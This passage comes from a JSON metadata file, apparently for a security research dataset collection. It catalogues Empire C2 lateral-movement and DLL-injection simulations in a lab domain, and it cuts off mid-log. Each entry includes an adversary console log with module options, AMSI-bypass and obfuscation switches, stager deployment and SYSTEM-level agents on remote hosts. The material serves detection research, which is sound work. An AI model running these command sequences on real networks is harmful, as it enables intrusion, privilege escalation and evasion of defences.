172.18.39.6\n\n(Empire: powershell/lateral_movement/invoke_smbexec) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nA7BWPR32 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5904 5/0.0 2020-09-18 18:29:36 http \nHBEW9G1D ps 172.18.39.6 WORKSTATION6 THESHIRE\\sbeavers powershell 6036 5/0.0 2020-09-18 18:15:39 http \n7ADX8ZVR ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 8948 5/0.0 2020-09-20 06:57:53 http \n\n3KL8YRUB ps 172.18.39.6 WORKSTATION6 *THESHIRE\\SYSTEM powershell 1152 5/0.0 2020-09-20 
06:57:49 http \n\n(Empire: agents) > interact 3KL8YRUB\n(Empire: 3KL8YRUB) > shell whoami\n[*] Tasked 3KL8YRUB to run TASK_SHELL\n[*] Agent 3KL8YRUB tasked with task ID 1\n(Empire: 3KL8YRUB) > \nnt authority\\system\n\n..Command execution completed.\n\n(Empire: 3KL8YRUB) >"}, "references": null}, "SDWIN-190518210652": {"title": "Empire Invoke PsExec", "id": "SDWIN-190518210652", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["RPC CreateService", "RPC StartService", "TCP Svcctl"], "description": "This dataset represents adversaries remotely creating and starting a service via RPC methods over TCP.", "attack_mappings": [{"technique": "T1021", "sub-technique": null, "tactics": ["TA0002", "TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_psexec_dcerpc_tcp_svcctl.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/empire_psexec_dcerpc_tcp_svcctl.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "lateral_movement", "script": "https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/lateral_movement/Invoke-PsExec.ps1"}], "permissions_required": ["User"], "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nA7BWPR32 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5904 5/0.0 2020-09-18 18:29:36 http \nHBEW9G1D ps 172.18.39.6 WORKSTATION6 THESHIRE\\sbeavers powershell 6036 5/0.0 2020-09-18 18:15:39 http \nUF5MYK42 ps 172.18.39.5 
WORKSTATION5 *THESHIRE\\pgustavo powershell 6404 5/0.0 2020-09-20 16:13:06 http \n\n\n(Empire: agents) > interact UF5MYK42\n(Empire: UF5MYK42) > usemodule lateral_movement/invoke_psexec\n(Empire: powershell/lateral_movement/invoke_psexec) > set Listener http\n(Empire: powershell/lateral_movement/invoke_psexec) > execute\n(Empire: powershell/lateral_movement/invoke_psexec) > set ComputerName WORKSTATION6.theshire.local\n(Empire: powershell/lateral_movement/invoke_psexec) > info\n\n Name: Invoke-PsExec\n Module: powershell/lateral_movement/invoke_psexec\n NeedsAdmin: False\n OpsecSafe: False\n Language: powershell\nMinLanguageVersion: 2\n Background: True\n OutputExtension: None\n\nAuthors:\n @harmj0y\n\nDescription:\n Executes a stager on remote hosts using PsExec type\n functionality.\n\nComments:\n https://github.com/rapid7/metasploit-\n framework/blob/master/tools/psexec.rb\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Agent True UF5MYK42 Agent to run module on. \n Listener False Listener to use. \n Obfuscate False False Switch. Obfuscate the launcher \n powershell code, uses the \n ObfuscateCommand for obfuscation types. \n For powershell only. \n ObfuscateCommand False Token\\All\\1 The Invoke-Obfuscation command to use. \n Only used if Obfuscate switch is True. \n For powershell only. \n AMSIBypass False True Include mattifestation's AMSI Bypass in \n the stager code. \n AMSIBypass2 False False Include Tal Liberman's AMSI Bypass in \n the stager code. \n ComputerName True ComputerName WORKSTATION6.theshire.local Host to execute the stager on. \n ServiceName True Updater The name of the service to create. \n Command False Custom command to execute on remote \n hosts. \n ResultFile False Name of the file to write the results to\n on agent machine. \n UserAgent False default User-agent string to use for the staging\n request (default, none, or other). 
\n Proxy False default Proxy to use for request (default, none,\n or other). \n ProxyCreds False default Proxy credentials \n ([domain\\]username:password) to use for \n request (default, none, or other). \n\n(Empire: powershell/lateral_movement/invoke_psexec) > execute\n[>] Module is not opsec safe, run? [y/N] y\n[*] Tasked UF5MYK42 to run TASK_CMD_JOB\n[*] Agent UF5MYK42 tasked with task ID 1\n[*] Tasked agent UF5MYK42 to run module powershell/lateral_movement/invoke_psexec\n(Empire: powershell/lateral_movement/invoke_psexec) > \nJob started: RNU5DY\n\n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6\n\n[*] New agent 9CMNYX72 checked in\n[+] Initial agent 9CMNYX72 from 172.18.39.6 now active (Slack)\n[*] Sending agent (stage 2) to 9CMNYX72 at 172.18.39.6\n\n(Empire: powershell/lateral_movement/invoke_psexec) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nA7BWPR32 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5904 5/0.0 2020-09-18 18:29:36 http \nHBEW9G1D ps 172.18.39.6 WORKSTATION6 THESHIRE\\sbeavers powershell 6036 5/0.0 2020-09-18 18:15:39 http \nUF5MYK42 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 6404 5/0.0 2020-09-20 16:17:06 http \n\n9CMNYX72 ps 172.18.39.6 WORKSTATION6 *THESHIRE\\SYSTEM powershell 4312 5/0.0 2020-09-20 16:17:08 http \n\n(Empire: agents) > interact 9CMNYX72\n(Empire: 9CMNYX72) > shell whoami\n[*] Tasked 9CMNYX72 to run TASK_SHELL\n[*] Agent 9CMNYX72 tasked with task ID 1\n(Empire: 9CMNYX72) > \nnt authority\\system\n\n..Command execution completed.\n\n(Empire: 9CMNYX72) > back"}, "references": null}, "SDWIN-190518211052": {"title": "Empire Invoke DCOM ShellWindows", "id": "SDWIN-190518211052", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/18", "platform": ["Windows"], "type": "atomic", 
"tags": ["DCOM ShellWindows"], "description": "This dataset represents adversaries executing commands remotely via DCOM ShellWindows COM Method.", "attack_mappings": [{"technique": "T1021", "sub-technique": "003", "tactics": ["TA0002", "TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_dcom_shellwindows_stager.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/empire_dcom_shellwindows_stager.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "lateral_movement", "script": "https://github.com/EmpireProject/Empire/blob/master/data/module_source/lateral_movement/Invoke-DCOM.ps1"}], "permissions_required": ["User"], "adversary_view": "(Empire: agents) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nA7BWPR32 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5904 5/0.0 2020-09-18 17:07:59 http \n\n(Empire: agents) > interact A7BWPR32\n(Empire: A7BWPR32) > usemodule lusemodule lateral_movement/invoke_dcom\n(Empire: powershell/lateral_movement/invoke_dcom) > info\n\n Name: Invoke-DCOM\n Module: powershell/lateral_movement/invoke_dcom\n NeedsAdmin: False\n OpsecSafe: True\n Language: powershell\nMinLanguageVersion: 2\n Background: False\n OutputExtension: None\n\nAuthors:\n @rvrsh3ll\n\nDescription:\n Execute a stager or command on remote hosts using DCOM.\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Agent True A7BWPR32 Agent to run module on. \n CredID False CredID from the store to use. \n ComputerName True WORKSTATION6 Host[s] to execute the stager on, comma \n separated. 
\n Method True ShellWindows COM method to use. MMC20.Application,She\n llWindows,ShellBrowserWindow,ExcelDDE \n Listener False http Listener to use. \n Command False Custom command to run. \n Obfuscate False False Switch. Obfuscate the launcher \n powershell code, uses the \n ObfuscateCommand for obfuscation types. \n For powershell only. \n ObfuscateCommand False Token\\All\\1 The Invoke-Obfuscation command to use. \n Only used if Obfuscate switch is True. \n For powershell only. \n AMSIBypass False True Include mattifestation's AMSI Bypass in \n the stager code. \n AMSIBypass2 False False Include Tal Liberman's AMSI Bypass in \n the stager code. \n UserAgent False default User-agent string to use for the staging\n request (default, none, or other). \n Proxy False default Proxy to use for request (default, none,\n or other). \n ProxyCreds False default Proxy credentials \n ([domain\\]username:password) to use for \n request (default, none, or other). \n\n(Empire: powershell/lateral_movement/invoke_dcom) > execute\n[*] Tasked A7BWPR32 to run TASK_CMD_WAIT\n[*] Agent A7BWPR32 tasked with task ID 6\n[*] Tasked agent A7BWPR32 to run module powershell/lateral_movement/invoke_dcom\n(Empire: powershell/lateral_movement/invoke_dcom) > \nCompleted\n\n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6\n[*] New agent HBEW9G1D checked in\n[+] Initial agent HBEW9G1D from 172.18.39.6 now active (Slack)\n[*] Sending agent (stage 2) to HBEW9G1D at 172.18.39.6\n\n(Empire: powershell/lateral_movement/invoke_dcom) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nA7BWPR32 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5904 5/0.0 2020-09-18 17:08:46 http \nHBEW9G1D ps 172.18.39.6 WORKSTATION6 THESHIRE\\sbeavers powershell 6036 5/0.0 2020-09-18 17:08:47 http \n\n(Empire: agents) > interact HBEW9G1D\n(Empire: HBEW9G1D) > 
shell whoami\n[*] Tasked HBEW9G1D to run TASK_SHELL\n[*] Agent HBEW9G1D tasked with task ID 1\n(Empire: HBEW9G1D) > \ntheshire\\sbeavers\n\n..Command execution completed.\n\n(Empire: HBEW9G1D) >", "notes": ["Windows Explorer must have an inbound rule to accept connections", "A user must be logged in (Locked enpoint does not work). I had to RDP to lab box"]}, "references": null}, "SDWIN-190518211456": {"title": "Empire Invoke PSRemoting", "id": "SDWIN-190518211456", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["PowerShell Remoting"], "description": "This dataset represents adversaries executing malicious code on remote hosts using PowerShell Remoting (WinRM).", "attack_mappings": [{"technique": "T1021", "sub-technique": "006", "tactics": ["TA0002", "TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_psremoting_stager.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/empire_psremoting_stager.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "invoke_psremoting", "script": "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/lateral_movement/invoke_psremoting.py"}], "permissions_required": ["User"], "adversary_view": "(Empire: agents) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nA7BWPR32 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5904 5/0.0 2020-09-18 18:29:36 http \nHBEW9G1D ps 172.18.39.6 WORKSTATION6 THESHIRE\\sbeavers powershell 6036 
5/0.0 2020-09-18 18:15:39 http \nUF5MYK42 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 6404 5/0.0 2020-09-20 21:05:28 http \n\n(Empire: agents) > interact UF5MYK42\n(Empire: UF5MYK42) > usemodule lateral_movement/invoke_psremoting\n(Empire: powershell/lateral_movement/invoke_psremoting) > set ComputerName WORKSTATION6.theshire.local\n(Empire: powershell/lateral_movement/invoke_psremoting) > set Listener http\n(Empire: powershell/lateral_movement/invoke_psremoting) > info\n\n Name: Invoke-PSRemoting\n Module: powershell/lateral_movement/invoke_psremoting\n NeedsAdmin: False\n OpsecSafe: True\n Language: powershell\nMinLanguageVersion: 2\n Background: False\n OutputExtension: None\n\nAuthors:\n @harmj0y\n\nDescription:\n Executes a stager on remote hosts using PSRemoting.\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Agent True UF5MYK42 Agent to run module on. \n CredID False CredID from the store to use. \n ComputerName True WORKSTATION6.theshire.lo Host[s] to execute the stager on, comma \n cal separated. \n Listener True http Listener to use. \n Obfuscate False False Switch. Obfuscate the launcher \n powershell code, uses the \n ObfuscateCommand for obfuscation types. \n For powershell only. \n ObfuscateCommand False Token\\All\\1 The Invoke-Obfuscation command to use. \n Only used if Obfuscate switch is True. \n For powershell only. \n AMSIBypass False True Include mattifestation's AMSI Bypass in \n the stager code. \n AMSIBypass2 False False Include Tal Liberman's AMSI Bypass in \n the stager code. \n UserName False [domain\\]username to use to execute \n command. \n Password False Password to use to execute command. \n UserAgent False default User-agent string to use for the staging\n request (default, none, or other). \n Proxy False default Proxy to use for request (default, none,\n or other). 
\n ProxyCreds False default Proxy credentials \n ([domain\\]username:password) to use for \n request (default, none, or other). \n\n(Empire: powershell/lateral_movement/invoke_psremoting) > execute\n[*] Tasked UF5MYK42 to run TASK_CMD_WAIT\n[*] Agent UF5MYK42 tasked with task ID 2\n[*] Tasked agent UF5MYK42 to run module powershell/lateral_movement/invoke_psremoting\n(Empire: powershell/lateral_movement/invoke_psremoting) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6\n[*] New agent L86DT27X checked in\n[+] Initial agent L86DT27X from 172.18.39.6 now active (Slack)\n[*] Sending agent (stage 2) to L86DT27X at 172.18.39.6\n\n(Empire: powershell/lateral_movement/invoke_psremoting) > \n(Empire: powershell/lateral_movement/invoke_psremoting) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nA7BWPR32 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5904 5/0.0 2020-09-18 18:29:36 http \nHBEW9G1D ps 172.18.39.6 WORKSTATION6 THESHIRE\\sbeavers powershell 6036 5/0.0 2020-09-18 18:15:39 http \nUF5MYK42 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 6404 5/0.0 2020-09-20 21:09:08 http \n\nL86DT27X ps 172.18.39.6 WORKSTATION6 *THESHIRE\\pgustavo powershell 10116 5/0.0 2020-09-20 21:09:23 http \n\n(Empire: agents) > interact L86DT27X\n(Empire: L86DT27X) > shell whoami\n[*] Tasked L86DT27X to run TASK_SHELL\n[*] Agent L86DT27X tasked with task ID 1\n(Empire: L86DT27X) > \ntheshire\\pgustavo\n\n..Command execution completed.\n\n(Empire: L86DT27X) >"}, "references": null}, "SDWIN-190518213907": {"title": "Empire Invoke Execute MSBuild", "id": "SDWIN-190518213907", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["WMI IWbemServices ExecMethod", "SMB CreateRequest"], "description": 
"This dataset represents an adversary remotely creating a file (.xml) via SMB and executing it remotetly via WMI and msbuild. This dataset focuses on the use of the WMI Win32_Process class and method Create to execute code remotely.", "attack_mappings": [{"technique": "T1047", "sub-technique": null, "tactics": ["TA0002", "TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_msbuild_dcerpc_wmi_smb.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/empire_msbuild_dcerpc_wmi_smb.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "invoke_executemsbuild", "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/lateral_movement/Invoke-ExecuteMSBuild.ps1"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nA7BWPR32 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5904 5/0.0 2020-09-18 18:29:36 http \nHBEW9G1D ps 172.18.39.6 WORKSTATION6 THESHIRE\\sbeavers powershell 6036 5/0.0 2020-09-18 18:15:39 http \nUF5MYK42 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 6404 5/0.0 2020-09-20 21:28:07 http \nAWTK7BX5 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 2228 5/0.0 2020-09-20 21:33:05 http \n\n(Empire: agents) > interact AWTK7BX5 \n(Empire: AWTK7BX5) > usemodule lateral_movement/invoke_executemsbuild\n(Empire: powershell/lateral_movement/invoke_executemsbuild) > info\n\n Name: Invoke-ExecuteMSBuild\n Module: powershell/lateral_movement/invoke_executemsbuild\n NeedsAdmin: False\n OpsecSafe: False\n 
Language: powershell\nMinLanguageVersion: 2\n Background: False\n OutputExtension: None\n\nAuthors:\n @xorrior\n\nDescription:\n This module utilizes WMI and MSBuild to compile and execute\n an xml file containing an Empire launcher\n\nComments:\n Inspired by @subtee\n http://subt0x10.blogspot.com/2016/09/bypassing-application-\n whitelisting.html\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Agent True AWTK7BX5 Agent to run module from. \n Listener False Listener to use. \n Command False Custom command to run. \n Obfuscate False False Switch. Obfuscate the launcher \n powershell code, uses the \n ObfuscateCommand for obfuscation types. \n For powershell only. \n ObfuscateCommand False Token\\All\\1 The Invoke-Obfuscation command to use. \n Only used if Obfuscate switch is True. \n For powershell only. \n AMSIBypass False True Include mattifestation's AMSI Bypass in \n the stager code. \n AMSIBypass2 False False Include Tal Liberman's AMSI Bypass in \n the stager code. \n CredID False CredID from the store to use. \n UserAgent False default User-agent string to use for the staging\n request (default, none, or other). \n Proxy False default Proxy to use for request (default, none,\n or other). \n ProxyCreds False default Proxy credentials \n ([domain\\]username:password) to use for \n request (default, none, or other). \n ComputerName True Host to target \n UserName False UserName if executing with credentials \n Password False Password if executing with credentials \n FilePath False Desired location to copy the xml file on\n the target \n DriveLetter False Drive letter to use when mounting the \n share locally \n\n(Empire: powershell/lateral_movement/invoke_executemsbuild) > set Listener http\n(Empire: powershell/lateral_movement/invoke_executemsbuild) > set ComputerName WORKSTATION6.theshire.local\n(Empire: powershell/lateral_movement/invoke_executemsbuild) > execute\n[>] Module is not opsec safe, run? 
[y/N] y\n[*] Tasked AWTK7BX5 to run TASK_CMD_WAIT\n[*] Agent AWTK7BX5 tasked with task ID 1\n[*] Tasked agent AWTK7BX5 to run module powershell/lateral_movement/invoke_executemsbuild\n(Empire: powershell/lateral_movement/invoke_executemsbuild) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6\n[*] New agent U63RL1XZ checked in\n[+] Initial agent U63RL1XZ from 172.18.39.6 now active (Slack)\n[*] Sending agent (stage 2) to U63RL1XZ at 172.18.39.6\n\n__GENUS : 2\n__CLASS : __PARAMETERS\n__SUPERCLASS : \n__DYNASTY : __PARAMETERS\n__RELPATH : \n__PROPERTY_COUNT : 2\n__DERIVATION : {}\n__SERVER : \n__NAMESPACE : \n__PATH : \nProcessId : 6952\nReturnValue : 0\nPSComputerName : \n\n(Empire: powershell/lateral_movement/invoke_executemsbuild) > \n(Empire: powershell/lateral_movement/invoke_executemsbuild) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nA7BWPR32 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5904 5/0.0 2020-09-18 18:29:36 http \nHBEW9G1D ps 172.18.39.6 WORKSTATION6 THESHIRE\\sbeavers powershell 6036 5/0.0 2020-09-18 18:15:39 http \nUF5MYK42 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 6404 5/0.0 2020-09-20 21:28:07 http\nAWTK7BX5 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 2228 5/0.0 2020-09-20 21:39:34 http \nU63RL1XZ ps 172.18.39.6 WORKSTATION6 *THESHIRE\\pgustavo powershell 3008 5/0.0 2020-09-20 21:39:35 http \n\n(Empire: agents) > interact U63RL1XZ\n(Empire: U63RL1XZ) > shell whoami\n[*] Tasked U63RL1XZ to run TASK_SHELL\n[*] Agent U63RL1XZ tasked with task ID 1\n(Empire: U63RL1XZ) > \ntheshire\\pgustavo\n\n..Command execution completed.\n\n(Empire: U63RL1XZ) >"}, "references": ["https://blog.f-secure.com/endpoint-detection-of-remote-service-creation-and-psexec/"]}, "SDWIN-190518221344": {"title": "Empire Invoke DLLInjection", "id": "SDWIN-190518221344", 
"contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/07/22", "modification_date": "2020/09/21", "platform": ["Windows"], "type": "atomic", "tags": ["DLL Injection", "LoadLibrary", "CreateRemoteThread Execution"], "description": "This dataset represents a threat actor injecting a Dll (On Disk) into an arbitrary process via LoadLibrary and executd by CreateRemoteThread APIs", "attack_mappings": [{"technique": "T1055", "sub-technique": "001", "tactics": ["TA0004", "TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/empire_dllinjection_LoadLibrary_CreateRemoteThread.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "invoke_dllinjection", "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/code_execution/Invoke-DllInjection.ps1"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire) > usestager windows/dll\n(Empire: stager/windows/dll) > \n(Empire: stager/windows/dll) > set Listener http\n(Empire: stager/windows/dll) > info\n\nName: DLL Launcher\n\nDescription:\n Generate a PowerPick Reflective DLL to inject with\n stager code.\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Listener True http Listener to use.\n Language True powershell Language of the stager to generate.\n Arch True x64 Architecture of the .dll to generate\n (x64 or x86).\n StagerRetries False 0 Times for the stager to retry\n connecting.\n UserAgent False default User-agent string to use for the staging\n request (default, none, or other).\n Proxy False default Proxy to use for request (default, none,\n or other).\n ProxyCreds False default Proxy credentials\n ([domain\\]username:password) to use for\n request (default, none, or other).\n OutFile True /tmp/launcher.dll File to output dll to.\n Obfuscate False False 
Switch. Obfuscate the launcher\n powershell code, uses the\n ObfuscateCommand for obfuscation types.\n For powershell only.\n ObfuscateCommand False Token\\All\\1 The Invoke-Obfuscation command to use.\n Only used if Obfuscate switch is True.\n For powershell only.\n\n\n(Empire: stager/windows/dll) > execute\n\n[*] Stager output written out to: /tmp/launcher.dll\n\n(Empire: stager/windows/dll) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\n712ETU3B ps 172.18.39.5 WORKSTATION5 *MORDOR\\pgustavo powershell 9076 5/0.0 2020-07-22 03:52:58 http \n\n(Empire: agents) > interact 712ETU3B\n(Empire: 712ETU3B) >\n(Empire: 712ETU3B) > ps\n[*] Tasked 712ETU3B to run TASK_SHELL\n[*] Agent 712ETU3B tasked with task ID 1\n(Empire: 712ETU3B) > upload /tmp/launcher.dll\n[*] Tasked agent to upload launcher.dll, 155 KB\n[*] Tasked 712ETU3B to run TASK_UPLOAD\n[*] Agent 712ETU3B tasked with task ID 2\n(Empire: 712ETU3B) >\nProcessName PID Arch UserName MemUsage \n----------- --- ---- -------- -------- \nIdle 0 x64 N/A 0.01 MB \nSystem 4 x64 N/A 0.14 MB \nRegistry 88 x64 NT AUTHORITY\\SYSTEM 59.03 MB \nsvchost 396 x64 NT AUTHORITY\\SYSTEM 8.43 MB \nsmss 408 x64 NT AUTHORITY\\SYSTEM 1.10 MB \nLogonUI 456 x64 NT AUTHORITY\\SYSTEM 47.74 MB \ncsrss 524 x64 NT AUTHORITY\\SYSTEM 4.66 MB \nwininit 596 x64 NT AUTHORITY\\SYSTEM 6.04 MB \ncsrss 604 x64 NT AUTHORITY\\SYSTEM 3.95 MB \nwinlogon 664 x64 NT AUTHORITY\\SYSTEM 9.32 MB \ncsrss 716 x64 NT AUTHORITY\\SYSTEM 5.08 MB \nservices 732 x64 NT AUTHORITY\\SYSTEM 12.67 MB \nlsass 740 x64 NT AUTHORITY\\SYSTEM 21.21 MB \ndwm 796 x64 Window Manager\\DWM-1 36.96 MB \nctfmon 808 x64 MORDOR\\pgustavo 13.93 MB \nsvchost 856 x64 NT AUTHORITY\\SYSTEM 3.58 MB \nfontdrvhost 880 x64 Font Driver Host\\UMFD-1 2.18 MB \nfontdrvhost 884 x64 Font Driver Host\\UMFD-0 2.22 MB \nsvchost 920 x64 NT AUTHORITY\\SYSTEM 
28.34 MB \nsvchost 996 x64 NT AUTHORITY\\NETWORK SERVICE 14.50 MB \nsvchost 1056 x64 NT AUTHORITY\\NETWORK SERVICE 67.65 MB \nsvchost 1096 x64 NT AUTHORITY\\SYSTEM 6.86 MB \nsvchost 1120 x64 NT AUTHORITY\\SYSTEM 9.29 MB \nsvchost 1164 x64 NT AUTHORITY\\LOCAL SERVICE 6.02 MB \nsvchost 1176 x64 NT AUTHORITY\\LOCAL SERVICE 6.60 MB \nsvchost 1184 x64 NT AUTHORITY\\LOCAL SERVICE 11.45 MB \nsvchost 1192 x64 NT AUTHORITY\\LOCAL SERVICE 5.42 MB \nbrowser_broker 1220 x64 MORDOR\\pgustavo 10.18 MB \nbackgroundTaskHost 1296 x64 MORDOR\\pgustavo 16.88 MB \nsvchost 1304 x64 NT AUTHORITY\\SYSTEM 14.52 MB \nsvchost 1356 x64 NT AUTHORITY\\LOCAL SERVICE 6.06 MB \nsvchost 1392 x64 NT AUTHORITY\\LOCAL SERVICE 27.38 MB \nsvchost 1408 x64 NT AUTHORITY\\NETWORK SERVICE 7.54 MB \nsvchost 1436 x64 NT AUTHORITY\\SYSTEM 10.04 MB \nsvchost 1444 x64 NT AUTHORITY\\SYSTEM 5.67 MB \nSecurityHealthSystray 1468 x64 MORDOR\\pgustavo 11.66 MB \nsvchost 1488 x64 NT AUTHORITY\\SYSTEM 5.47 MB \nsvchost 1496 x64 NT AUTHORITY\\SYSTEM 6.18 MB \nsvchost 1504 x64 NT AUTHORITY\\SYSTEM 6.77 MB \nsvchost 1532 x64 NT AUTHORITY\\LOCAL SERVICE 7.59 MB \nsvchost 1544 x64 NT AUTHORITY\\LOCAL SERVICE 5.32 MB \nsvchost 1740 x64 NT AUTHORITY\\NETWORK SERVICE 11.28 MB \nsvchost 1764 x64 NT AUTHORITY\\LOCAL SERVICE 16.14 MB \nsvchost 1868 x64 NT AUTHORITY\\LOCAL SERVICE 17.68 MB \nVSSVC 1936 x64 NT AUTHORITY\\SYSTEM 7.02 MB \nsvchost 1960 x64 NT AUTHORITY\\SYSTEM 13.24 MB \nsvchost 1968 x64 NT AUTHORITY\\LOCAL SERVICE 7.03 MB \nsvchost 1980 x64 NT AUTHORITY\\SYSTEM 47.10 MB \nsvchost 1992 x64 NT AUTHORITY\\SYSTEM 5.35 MB \nRuntimeBroker 2068 x64 MORDOR\\pgustavo 21.71 MB \nMemory Compression 2104 x64 NT AUTHORITY\\SYSTEM 98.54 MB \nsvchost 2188 x64 NT AUTHORITY\\SYSTEM 9.24 MB \nbackgroundTaskHost 2196 x64 MORDOR\\pgustavo 38.76 MB \nsvchost 2208 x64 NT AUTHORITY\\SYSTEM 7.00 MB \nSgrmBroker 2252 x64 NT AUTHORITY\\SYSTEM 5.88 MB \nspoolsv 2260 x64 NT AUTHORITY\\SYSTEM 14.19 MB \nsvchost 2264 x64 NT AUTHORITY\\SYSTEM 
